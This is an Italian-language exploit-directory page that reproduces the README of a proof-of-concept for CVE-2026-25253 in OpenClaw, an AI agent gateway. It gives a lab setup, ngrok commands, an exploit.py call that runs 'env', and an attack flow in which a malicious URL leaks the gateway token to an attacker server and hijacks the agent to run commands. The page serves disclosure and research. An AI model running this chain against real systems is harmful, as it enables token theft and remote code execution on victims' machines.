Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-25253 — Proof-of-concept di exploit per CVE-2026-25253 in OpenClaw: un gatewayUrl appositamente creato esfiltra il token del gateway della Control UI, consentendo l'accesso non autorizzato al gateway e l'esecuzione di codice in remoto con 1 clic. | Kitploit
Strumenti/GitHubGitHub/yym8538/cve-2026-25253
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiSicurezza WebPenetration TestingAutenticazioneRed TeamingStrumento di Accesso Remoto
GitHubyym8538/cve-2026-25253

CVE-2026-25253

Proof-of-concept di exploit per CVE-2026-25253 in OpenClaw: un gatewayUrl appositamente creato esfiltra il token del gateway della Control UI, consentendo l'accesso non autorizzato al gateway e l'esecuzione di codice in remoto con 1 clic.

11 mese faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-25253 OpenClaw RCE 1-Click

★ CVE-2026-25253 OpenClaw Remote Code Execution 1-Click PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descrizione

CVE-2026-25253 : Vulnerabilità di esfiltrazione del token di autenticazione di OpenClaw

description: OpenClaw (noto anche come clawdbot o Moltbot) precedente alla v2026.1.29 consente agli attaccanti di esfiltrare un token di autenticazione del gateway memorizzato fornendo un valore craftato del parametro query-string gatewayUrl alla Control UI, che stabilisce automaticamente una connessione WebSocket senza validazione o conferma dell'utente. Ciò può portare ad accesso non autorizzato al gateway ed esecuzione di codice remoto con 1-click.

Requisiti

  • Docker (Docker Desktop su Windows)
  • Python 3.x (lato attacco)

File

  • Dockerfile — build dell'ambiente vulnerabile OpenClaw
  • templates/ — pagine web malevole utilizzate dall'exploit
  • config.txt — configurazione di OpenClaw utilizzata nell'ambiente vittima
  • exploit.py — server di exploit
  • requirements.txt — dipendenze del PoC

Configurazione dell'ambiente

  1. Build dell'immagine Docker
docker build -t openclaw-vuln .
  1. Esecuzione dell'ambiente (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Creazione del tunnel SSH
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Password: openclawlab
  1. Accesso alla Control UI di OpenClaw Aprire il seguente URL nel browser
http://127.0.0.1:18789/
  1. Inserire il Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Cliccare su Connect
  3. Aprire la scheda Config
  4. incollare il contenuto di config.txt
  5. Sostituire il campo API key con la propria chiave API OpenAI
  6. Salvare la configurazione
  7. Confermare che l'agente risponda normalmente

Proof of Concept (PoC)

  1. Installazione delle dipendenze (lato attacco)
pip3 install -r requirements.txt
  1. Esposizione del server di exploit tramite HTTPS
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copiare l'hostname di forwarding generato
  1. Esecuzione del server di exploit
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Esempio:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Attivazione dell'attacco
  1. Aprire la pagina malevola esposta dal server di exploit
  2. Simulare l'interazione della vittima con la pagina
  3. Attivare il flusso di exploit dal browser

Flusso dell'attacco

  1. Un URL malevolo modifica il gatewayUrl della Control UI della vittima
  2. Il browser si connette automaticamente all'endpoint WebSocket controllato dall'attaccante
  3. Il token di autenticazione del gateway viene divulgato all'attaccante
  4. La pagina malevola utilizza il token rubato per aprire una nuova connessione WebSocket al gateway OpenClaw locale della vittima
  5. Una richiesta di esecuzione di comandi viene inviata attraverso l'agente
  6. Il risultato dell'esecuzione viene restituito al server dell'attaccante

Risultato atteso

  • Il browser della vittima viene reindirizzato nel flusso WebSocket malevolo
  • Il token di autenticazione del gateway viene catturato dall'attaccante
  • L'attaccante può inviare una richiesta di esecuzione di comandi attraverso OpenClaw
  • L'output del comando viene restituito al server dell'attaccante

Output di esempio

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Note

  • Questo PoC prende di mira OpenClaw 2026.1.24-1
  • La catena di exploit si basa sulla gestione vulnerabile del gatewayUrl nella Control UI
  • Per l'accesso remoto alla vittima, la pagina malevola deve essere servita tramite HTTPS
  • Il gateway OpenClaw locale viene raggiunto attraverso il browser della vittima come bridge

EQST Insight

Pubblichiamo analisi di CVE e malware una volta al mese. Se siete interessati, seguite i link sottostanti per consultare le nostre pubblicazioni.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Scarica lo strumento